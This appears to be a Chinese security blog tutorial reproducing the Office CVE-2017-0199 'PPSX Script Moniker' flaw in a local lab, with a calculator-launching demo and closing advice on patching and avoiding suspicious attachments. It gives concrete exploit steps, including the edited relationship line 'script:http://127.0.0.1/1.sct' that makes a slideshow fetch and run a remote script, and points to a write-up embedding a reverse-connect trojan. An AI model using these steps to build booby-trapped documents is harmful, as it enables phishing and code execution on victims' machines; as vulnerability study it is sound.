Office远程代码执行漏洞CVE-2017-0199复现

在刚刚结束的BlackHat2017黑帽大会上，最佳客户端安全漏洞奖颁给了CVE-2017-0199漏洞，这个漏洞是Office系列办公软件中的一个逻辑漏洞，和常规的内存破坏型漏洞不同，这类漏洞无需复杂的利用手法，直接就可以在office文档中运行任意的恶意脚本，使用起来稳定可靠，故而非常适合于漏洞学习新手测试调试使用，作为一个已经测试过该漏洞的新手，现将搭建环境和测试的全部过程呈献给大家，希望能对大家的学习有所帮助。

CVE-2017-0199实际上包含两个漏洞，其中一个称为“RTF URL Moniker”漏洞，另一个被称为“PPSX Script Moniker”漏洞，在这里我们演示一下PPSXScript Moniker漏洞的测试方式。

首先准备一台apache服务器，为了简化配置apache的过程，在这里我们直接安装xampp，XAMPP是一个把Apache网页服务器与PHP、Perl及MariaDB集合在一起的安装包，允许用户可以在自己的电脑上轻易的建立网页服务器，安装起来十分简单，无需配置其它设置。安装完成后，我们打开IE浏览器，输入http://127.0.0.1，如果能够跳转到XAMPP的欢迎界面，就认为服务器已经搭建成功了。

图1：XAMPP欢迎界面

如果你安装XAMPP时选择的是默认路径，那么你可以在C盘的根目录下找到该软件，下一步我们要做的工作时在服务器的目录下添加一个sct脚本，此处作为测试该脚本是否执行，我们让该脚本启动一个计算器程序，sct脚本代码如下：

图2：启动计算器脚本代码

我们将该脚本命名为1.sct，存放在C:\xampp\htdocs\路径下，以便于接下来我们使用的PPSX能够链接并执行改脚本。

第三步，我们修改ppsx样本文件，样本的地址可以从https://github.com/temesgeny/ppsx-file-generator网址处下载到。下载到的文件中包含一个python脚本和生成好的template.ppsx，我们直接改造template.ppsx模板，首先将改文件的后缀名改为.zip，然后将压缩文件解压，解压后的文件内容如下图所示：

图3：模板ppsx文件解压后文件内容

我们在路径ppt\slides\_rels下找到slide1.xml.rels文件，我们将图中用蓝色圈出的路径用我们自己服务的地址来替换，即更改为Target="script:http://127.0.0.1/1.sct"

图4：更改前slide1.xml.rels文件内容

更改完成后，我们将解压的四个文件重新以zip的格式压缩，这里注意不要直接压缩上一层路径的template文件夹，否则压缩后会出现两层文件夹，压缩任务完成后，我们把压缩文件的后缀名重新更正为template.ppsx，然后再次打开该文件，结果如下图所示：

图5：漏洞利用结果图

可以观察到，在打开ppsx文件后，我们嵌入在ppsx中的远程地址链接并下载了1.sct脚本，然后执行了该脚本，成功的开启了一个计算器程序。

关于RTF URL Moniker的漏洞测试在http://www.freebuf.com/articles/system/131969.html 这篇文章中写的非常详细了，实测能够成功复现漏洞，在这里就不再重复赘述了。

最后给大家推荐几个链接，在了解CVE-2017-0199漏洞的过程中，分别参考了这几篇文章：

（1）《Moniker魔法：直接在Microsoft Office中运行脚本》http://bbs.pediy.com/thread-219234.htm 这篇文章对漏洞发现的过程和原理描述的非常清晰，对底层比较感兴趣的同学可以了解学习一下

（2）http://www.freebuf.com/vuls/144054.html 这篇文章提供了一个ppsx的高级利用方式，在ppsx中嵌入了kali生成的回连木马。

​最后给广大用户朋友们提几点建议，防止恶意程序给您带来不必要的损失：    ​

1. 及时更新最新补丁，安装杀毒软件，最大限度保证自己不受恶意软件侵害

2. 若收到邮件包含附件，不要直接打开，很可能是利用这个漏洞进行攻击钓鱼邮件，一旦打开将直接中招，先查杀再打开，来历不明的邮件别收

3. 网上下的word文档、PPSX、PPT文件别随意打开，先查杀。

希望小子的文章值得你收藏与转发，关注安全小子，安全路上，你我同行：

​